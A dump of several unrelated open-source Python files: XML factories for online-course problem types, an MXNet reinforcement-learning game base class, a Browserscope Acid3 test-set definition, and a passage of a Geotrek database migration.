Take the form "[ [[x1,y1], [x2,y2], [x3,y3]],
[[x1,y1], [x2,y2], [x3,y3]] ]"
(Defines two regions, each with 3 points)
REQUIRED: Either *rectangle* or *region* (or both)
"""
# Get the **kwargs
src = kwargs.get("src", "/static/image.jpg")
width = kwargs.get("width", 100)
height = kwargs.get("height", 100)
rectangle = kwargs.get('rectangle', None)
regions = kwargs.get('regions', None)
assert(rectangle or regions)
# Create the <imageinput> element
input_element = etree.Element("imageinput")
input_element.set("src", str(src))
input_element.set("width", str(width))
input_element.set("height", str(height))
if rectangle:
input_element.set("rectangle", rectangle)
if regions:
input_element.set("regions", regions)
return input_element
class JavascriptResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <javascriptresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <javascriptresponse> element.
Uses **kwargs:
*generator_src*: Name of the JS file to generate the problem.
*grader_src*: Name of the JS file to grade the problem.
*display_class*: Name of the class used to display the problem
*display_src*: Name of the JS file used to display the problem
*param_dict*: Dictionary of parameters to pass to the JS
"""
# Get **kwargs
generator_src = kwargs.get("generator_src", None)
grader_src = kwargs.get("grader_src", None)
display_class = kwargs.get("display_class", None)
display_src = kwargs.get("display_src", None)
param_dict = kwargs.get("param_dict", {})
# Both display_src and display_class given,
# or neither given
assert((display_src and display_class) or
(not display_src and not display_class))
# Create the <javascriptresponse> element
response_element = etree.Element("javascriptresponse")
if generator_src:
generator_element = etree.SubElement(response_element, "generator")
generator_element.set("src", str(generator_src))
if grader_src:
grader_element = etree.SubElement(response_element, "grader")
grader_element.set("src", str(grader_src))
if display_class and display_src:
display_element = etree.SubElement(response_element, "display")
display_element.set("class", str(display_class))
display_element.set("src", str(display_src))
for (param_name, param_val) in param_dict.items():
responseparam_element = etree.SubElement(response_element, "responseparam")
responseparam_element.set("name", str(param_name))
responseparam_element.set("value", str(param_val))
return response_element
def create_input_element(self, **kwargs):
""" Create the <javascriptinput> element """
return etree.Element("javascriptinput")
class MultipleChoiceResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <multiplechoiceresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <multiplechoiceresponse> element"""
return etree.Element('multiplechoiceresponse')
def create_input_element(self, **kwargs):
""" Create the <choicegroup> element"""
kwargs['choice_type'] = 'multiple'
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class TrueFalseResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <truefalseresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <truefalseresponse> element"""
return etree.Element('truefalseresponse')
def create_input_element(self, **kwargs):
""" Create the <choicegroup> element"""
kwargs['choice_type'] = 'multiple'
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class OptionResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <optionresponse> XML"""
def create_response_element(self, **kwargs):
""" Create the <optionresponse> element"""
return etree.Element("optionresponse")
def create_input_element(self, **kwargs):
""" Create the <optioninput> element.
Uses **kwargs:
*options*: a list of possible options the user can choose from [REQUIRED]
You must specify at least 2 options.
*correct_option*: the correct choice from the list of options [REQUIRED]
"""
options_list = kwargs.get('options', None)
correct_option = kwargs.get('correct_option', None)
assert(options_list and correct_option)
assert(len(options_list) > 1)
assert(correct_option in options_list)
# Create the <optioninput> element
optioninput_element = etree.Element("optioninput")
# Set the "options" attribute
# Format: "('first', 'second', 'third')"
options_attr_string = u",".join([u"'{}'".format(o) for o in options_list])
options_attr_string = u"({})".format(options_attr_string)
optioninput_element.set('options', options_attr_string)
# Set the "correct" attribute
optioninput_element.set('correct', str(correct_option))
return optioninput_element
class StringResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <stringresponse> XML """
def create_response_element(self, **kwargs):
""" Create a <stringresponse> XML element.
Uses **kwargs:
*answer*: The correct answer (a string) [REQUIRED]
*case_sensitive*: Whether the response is case-sensitive (True/False)
[DEFAULT: True]
*hints*: List of (hint_prompt, hint_name, hint_text) tuples
Where *hint_prompt* is the string for which we show the hint,
*hint_name* is an internal identifier for the hint,
and *hint_text* is the text we show for the hint.
*hintfn*: The name of a function in the script to use for hints.
*regexp*: Whether the response is regexp
*additional_answers*: list of additional asnwers.
"""
# Retrieve the **kwargs
answer = kwargs.get("answer", None)
case_sensitive = kwargs.get("case_sensitive", None)
hint_list = kwargs.get('hints', None)
hint_fn = kwargs.get('hintfn', None)
regexp = kwargs.get('regexp', None)
additional_answers = kwargs.get('additional_answers', [])
assert answer
# Create the <stringresponse> element
response_element = etree.Element("stringresponse")
# Set the answer attribute
response_element.set("answer", unicode(answer))
# Set the case sensitivity and regexp:
type_value = ''
if case_sensitive is not None:
type_value += "cs" if case_sensitive else "ci"
type_value += ' regexp' if regexp else ''
if type_value:
response_element.set("type", type_value.strip())
# Add the hints if specified
if hint_list or hint_fn:
hintgroup_element = etree.SubElement(response_element, "hintgroup")
if hint_list:
assert not hint_fn
for (hint_prompt, hint_name, hint_text) in hint_list:
stringhint_element = etree.SubElement(hintgroup_element, "stringhint")
stringhint_element.set("answer", str(hint_prompt))
stringhint_element.set("name", str(hint_name))
hintpart_element = etree.SubElement(hintgroup_element, "hintpart")
hintpart_element.set("on", str(hint_name))
hint_text_element = etree.SubElement(hintpart_element, "text")
hint_text_element.text = str(hint_text)
if hint_fn:
assert not hint_list
hintgroup_element.set("hintfn", hint_fn)
for additional_answer in additional_answers:
etree.SubElement(response_element, "additional_answer").text = additional_answer
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class AnnotationResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <annotationresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <annotationresponse> element """
return etree.Element("annotationresponse")
def create_input_element(self, **kwargs):
""" Create a <annotationinput> element."""
input_element = etree.Element("annotationinput")
text_children = [
{'tag': 'title', 'text': kwargs.get('title', 'super cool annotation')},
{'tag': 'text', 'text': kwargs.get('text', 'texty text')},
{'tag': 'comment', 'text':kwargs.get('comment', 'blah blah erudite comment blah blah')},
{'tag': 'comment_prompt', 'text': kwargs.get('comment_prompt', 'type a commentary below')},
{'tag': 'tag_prompt', 'text': kwargs.get('tag_prompt', 'select one tag')}
]
for child in text_children:
etree.SubElement(input_element, child['tag']).text = child['text']
default_options = [('green', 'correct'),('eggs', 'incorrect'), ('ham', 'partially-correct')]
options = kwargs.get('options', default_options)
options_element = etree.SubElement(input_element, 'options')
for (description, correctness) in options:
option_element = etree.SubElement(options_element, 'option', {'choice': correctness})
option_element.text = description
return input_element
class SymbolicResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <symbolicresponse> xml """
def create_response_element(self, **kwargs):
""" Build the <symbolicresponse> XML element.
Uses **kwargs:
*expect*: The correct answer (a sympy string)
*options*: list of option strings to pass to symmath_check
(e.g. 'matrix', 'qbit', 'imaginary', 'numerical')"""
# Retrieve **kwargs
expect = kwargs.get('expect', '')
options = kwargs.get('options', [])
# Symmath check expects a string of options
options_str = ",".join(options)
# Construct the <symbolicresponse> element
response_element = etree.Element('symbolicresponse')
if expect:
response_element.set('expect', str(expect))
if options_str:
response_element.set('options', str(options_str))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class ChoiceTextResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <choicetextresponse> xml """
def create_response_element(self, **kwargs):
""" Create a <choicetextresponse> element """
return etree.Element("choicetextresponse")
def create_input_element(self, **kwargs):
""" Create a <checkboxgroup> element.
choices can be specified in the following format:
[("true", [{"answer": "5", "tolerance": 0}]),
("false", [{"answer": "5", "tolerance": 0}])
]
This indicates that the first checkbox/radio is correct and it
contains a numtolerance_input with an answer of 5 and a tolerance of 0
It also indicates that the second has a second incorrect radiobutton
or checkbox with a numtolerance_input.
"""
choices = kwargs.get('choices', [("true", {})])
choice_inputs = []
# Ensure that the first element of choices is an ordered
# collection. It will start as a list, a tuple, or not a Container.
if type(choices[0]) not in [list, tuple]:
choices = [choices]
for choice in choices:
correctness, answers = choice
numtolerance_inputs = []
# If the current `choice` contains any("answer": number)
# elements, turn those into numtolerance_inputs
if answers:
# `answers` will be a list or tuple of answers or a single
# answer, representing the answers for numtolerance_inputs
# inside of this specific choice.
# Make sure that `answers` is an ordered collection for
# convenience.
if type(answers) not in [list, tuple]:
answers = [answers]
numtolerance_inputs = [
self._create_numtolerance_input_element(answer)
for answer in answers
]
choice_inputs.append(
self._create_choice_element(
correctness=correctness,
inputs=numtolerance_inputs
)
)
# Default type is 'radiotextgroup'
input_type = kwargs.get('type', 'radiotextgroup')
input_element = etree.Element(input_type)
for ind, choice in enumerate(choice_inputs):
# Give each choice text equal to it's position(0,1,2...)
choice.text = "choice_{0}".format(ind)
input_element.append(choice)
return input_element
def _create_choice_element(self, **kwargs):
"""
Creates a choice element for a choictextproblem.
Defaults to a correct choice with no numtolerance_input
"""
text = kwargs.get('text', '')
correct = kwargs.get('correctness', "true")
inputs = kwargs.get('inputs', [])
choice_element = etree.Element("choice")
choice_element.set("correct", correct)
choice_element.text = text
for inp in inputs:
# Add all of the inputs as children of this choice
choice_element.append(inp)
return choice_element
def _create_numtolerance_input_element(self, params):
"""
Creates a <numtolerance_input/> or <decoy_input/> element with
optionally specified tolerance and answer.
"""
answer = params['answer'] if 'answer' in params else None
# If there is not an answer specified, Then create a <decoy_input/>
# otherwise create a <numtolerance_input/> and set its tolerance
# and answer attributes.
if answer:
text_input = etree.Element("numtolerance_input")
text_input.set('answer', answer)
# If tolerance was specified, was specified use it, otherwise
# Set the tolerance to "0"
text_input.set(
'tolerance',
params['tolerance'] if 'tolerance' in params else "0"
)
else:
text_input = etree.Element("decoy_input")
return text_input
| agpl-3.0 |
rahul003/mxnet | example/reinforcement-learning/dqn/game.py | 52 | 1555 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
DEFAULT_MAX_EPISODE_STEP = 1000000
class Game(object):
def __init__(self):
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
def start(self):
raise NotImplementedError("Must Implement!")
def begin_episode(self, max_episode_step):
raise NotImplementedError("Must Implement!")
@property
def episode_terminate(self):
raise NotImplementedError
def get_observation(self):
raise NotImplementedError
@property
def state_enabled(self):
raise NotImplementedError
def current_state(self):
return self.replay_memory.latest_slice()
def play(self, a):
raise NotImplementedError
| apache-2.0 |
githubashto/browserscope | categories/acid3/test_set.py | 9 | 2659 | #!/usr/bin/python2.5
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License')
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark Tests Definitions."""
import logging
from categories import test_set_base
_CATEGORY = 'acid3'
class Acid3Test(test_set_base.TestBase):
TESTS_URL_PATH = '/%s/test' % _CATEGORY
def __init__(self, key, name, doc):
"""Initialze a benchmark test.
Args:
key: key for this in dict's
name: a human readable label for display
doc: a description of the test
"""
test_set_base.TestBase.__init__(
self,
key=key,
name=name,
url=self.TESTS_URL_PATH,
doc=doc,
min_value=0,
max_value=100)
_TESTS = (
# key, name, doc
Acid3Test(
'score', 'Score', 'Acid3 test score'
),
)
class Acid3TestSet(test_set_base.TestSet):
def GetTestScoreAndDisplayValue(self, test_key, raw_scores):
"""Get a normalized score (0 to 100) and a value to output to the display.
Args:
test_key: a key for a test_set test.
raw_scores: a dict of raw_scores indexed by key.
Returns:
score, display_value
# score is an integer in 0 to 100.
# display_value is the text for the cell.
"""
raw_score = raw_scores.get(test_key, 0)
if raw_score:
return raw_score, '%s/100' % raw_score
else:
return 0, ''
def GetRowScoreAndDisplayValue(self, results):
"""Get the overall score for this row of results data.
Args:
results: {
'test_key_1': {'score': score_1, 'raw_score': raw_score_1, ...},
'test_key_2': {'score': score_2, 'raw_score': raw_score_2, ...},
...
}
Returns:
score, display_value
# score is from 0 to 100.
# display_value is the text for the cell.
"""
test_key = 'score'
score = results.get(test_key, {}).get('score', None) or 0
return score, ''
TEST_SET = Acid3TestSet(
category=_CATEGORY,
category_name='Acid3',
summary_doc='Tests of dynamic browser capabilities to encourage browser interoperability.',
tests=_TESTS,
test_page='/%s/%s.html' % (_CATEGORY, _CATEGORY)
)
| apache-2.0 |
Anaethelion/Geotrek | geotrek/trekking/migrations/0020_auto__add_field_accessibility_pictogram.py | 3 | 24350 | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
from django.conf import settings
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Accessibility.pictogram'
db.add_column('o_b_accessibilite', 'pictogram',
self.gf('django.db.models.fields.files.FileField')(max_length=512, null=True, db_column='picto'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Accessibility.pictogram'
db.delete_column('o_b_accessibilite', 'picto')
models = {
u'authent.structure': {
'Meta': {'ordering': "['name']", 'object_name': 'Structure'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
u'common.theme': {
'Meta': {'ordering': "['label']", 'object_name': 'Theme', 'db_table': "'o_b_theme'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'theme'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'core.comfort': {
'Meta': {'ordering': "['comfort']", 'object_name': 'Comfort', 'db_table': "'l_b_confort'"},
'comfort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'confort'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.datasource': {
'Meta': {'ordering': "['source']", 'object_name': 'Datasource', 'db_table': "'l_b_source'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.network': {
'Meta': {'ordering': "['network']", 'object_name': 'Network', 'db_table': "'l_b_reseau'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'reseau'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.path': {
'Meta': {'object_name': 'Path', 'db_table': "'l_t_troncon'"},
'arrival': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'null': 'True', 'db_column': "'arrivee'", 'blank': 'True'}),
'ascent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_positive'", 'blank': 'True'}),
'comfort': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'confort'", 'to': u"orm['core.Comfort']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'remarques'", 'blank': 'True'}),
'datasource': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'source'", 'to': u"orm['core.Datasource']"}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_column': "'date_insert'", 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "'date_update'", 'blank': 'True'}),
'departure': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'null': 'True', 'db_column': "'depart'", 'blank': 'True'}),
'descent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_negative'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.LineStringField', [], {'srid': str(settings.SRID), 'spatial_index': 'False'}),
'geom_3d': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'dim': '3', 'spatial_index': 'False', 'null': 'True', 'srid': str(settings.SRID)}),
'geom_cadastre': ('django.contrib.gis.db.models.fields.LineStringField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'longueur'", 'blank': 'True'}),
'max_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_maximum'", 'blank': 'True'}),
'min_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_minimum'", 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'db_column': "'nom'", 'blank': 'True'}),
'networks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'paths'", 'to': u"orm['core.Network']", 'db_table': "'l_r_troncon_reseau'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'slope': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'pente'", 'blank': 'True'}),
'stake': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'enjeu'", 'to': u"orm['core.Stake']"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'usages': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'paths'", 'to': u"orm['core.Usage']", 'db_table': "'l_r_troncon_usage'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_column': "'valide'"}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_column': "'visible'"})
},
u'core.pathaggregation': {
'Meta': {'ordering': "['order']", 'object_name': 'PathAggregation', 'db_table': "'e_r_evenement_troncon'"},
'end_position': ('django.db.models.fields.FloatField', [], {'db_column': "'pk_fin'", 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'ordre'", 'blank': 'True'}),
'path': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aggregations'", 'on_delete': 'models.DO_NOTHING', 'db_column': "'troncon'", 'to': u"orm['core.Path']"}),
'start_position': ('django.db.models.fields.FloatField', [], {'db_column': "'pk_debut'", 'db_index': 'True'}),
'topo_object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aggregations'", 'db_column': "'evenement'", 'to': u"orm['core.Topology']"})
},
u'core.stake': {
'Meta': {'ordering': "['id']", 'object_name': 'Stake', 'db_table': "'l_b_enjeu'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stake': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'enjeu'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.topology': {
'Meta': {'object_name': 'Topology', 'db_table': "'e_t_evenement'"},
'ascent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_positive'", 'blank': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_column': "'date_insert'", 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "'date_update'", 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'supprime'"}),
'descent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_negative'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False'}),
'geom_3d': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'dim': '3', 'spatial_index': 'False', 'null': 'True', 'srid': str(settings.SRID)}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'length': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'longueur'", 'blank': 'True'}),
'max_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_maximum'", 'blank': 'True'}),
'min_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_minimum'", 'blank': 'True'}),
'offset': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_column': "'decallage'"}),
'paths': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Path']", 'through': u"orm['core.PathAggregation']", 'db_column': "'troncons'", 'symmetrical': 'False'}),
'slope': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'pente'", 'blank': 'True'})
},
u'core.usage': {
'Meta': {'ordering': "['usage']", 'object_name': 'Usage', 'db_table': "'l_b_usage'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'usage': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'usage'"})
},
u'tourism.informationdesk': {
'Meta': {'ordering': "['name']", 'object_name': 'InformationDesk', 'db_table': "'t_b_renseignement'"},
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '256', 'null': 'True', 'db_column': "'email'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom'", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'municipality': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_column': "'commune'", 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_column': "'nom'"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'telephone'", 'blank': 'True'}),
'photo': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'photo'", 'blank': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'db_column': "'code'", 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_column': "'rue'", 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'desks'", 'db_column': "'type'", 'to': u"orm['tourism.InformationDeskType']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '256', 'null': 'True', 'db_column': "'website'", 'blank': 'True'})
},
u'tourism.informationdesktype': {
'Meta': {'ordering': "['label']", 'object_name': 'InformationDeskType', 'db_table': "'t_b_type_renseignement'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'label'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.accessibility': {
'Meta': {'ordering': "['name']", 'object_name': 'Accessibility', 'db_table': "'o_b_accessibilite'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.difficultylevel': {
'Meta': {'ordering': "['id']", 'object_name': 'DifficultyLevel', 'db_table': "'o_b_difficulte'"},
'difficulty': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'difficulte'"}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.poi': {
'Meta': {'object_name': 'POI', 'db_table': "'o_t_poi'", '_ormbases': [u'core.Topology']},
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'publication_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_column': "'date_publication'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'public'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'topo_object': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Topology']", 'unique': 'True', 'primary_key': 'True', 'db_column': "'evenement'"}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pois'", 'db_column': "'type'", 'to': u"orm['trekking.POIType']"})
},
u'trekking.poitype': {
'Meta': {'ordering': "['label']", 'object_name': 'POIType', 'db_table': "'o_b_poi'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.practice': {
'Meta': {'ordering': "['name']", 'object_name': 'Practice', 'db_table': "'o_b_pratique'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.route': {
'Meta': {'ordering': "['route']", 'object_name': 'Route', 'db_table': "'o_b_parcours'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"}),
'route': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'parcours'"})
},
u'trekking.trek': {
'Meta': {'ordering': "['name']", 'object_name': 'Trek', 'db_table': "'o_t_itineraire'", '_ormbases': [u'core.Topology']},
'access': ('django.db.models.fields.TextField', [], {'db_column': "'acces'", 'blank': 'True'}),
'accessibilities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.Accessibility']", 'db_table': "'o_r_itineraire_accessibilite'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'advice': ('django.db.models.fields.TextField', [], {'db_column': "'recommandation'", 'blank': 'True'}),
'advised_parking': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'parking'", 'blank': 'True'}),
'ambiance': ('django.db.models.fields.TextField', [], {'db_column': "'ambiance'", 'blank': 'True'}),
'arrival': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'arrivee'", 'blank': 'True'}),
'departure': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'depart'", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'description_teaser': ('django.db.models.fields.TextField', [], {'db_column': "'chapeau'", 'blank': 'True'}),
'difficulty': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'difficulte'", 'to': u"orm['trekking.DifficultyLevel']"}),
'disabled_infrastructure': ('django.db.models.fields.TextField', [], {'db_column': "'handicap'", 'blank': 'True'}),
'duration': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_column': "'duree'", 'blank': 'True'}),
'information_desks': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['tourism.InformationDesk']", 'null': 'True', 'db_table': "'o_r_itineraire_renseignement'", 'blank': 'True'}),
'is_park_centered': ('django.db.models.fields.BooleanField', [], {'db_column': "'coeur'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'networks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.TrekNetwork']", 'db_table': "'o_r_itineraire_reseau'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'parking_location': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom_parking'", 'blank': 'True'}),
'points_reference': ('django.contrib.gis.db.models.fields.MultiPointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom_points_reference'", 'blank': 'True'}),
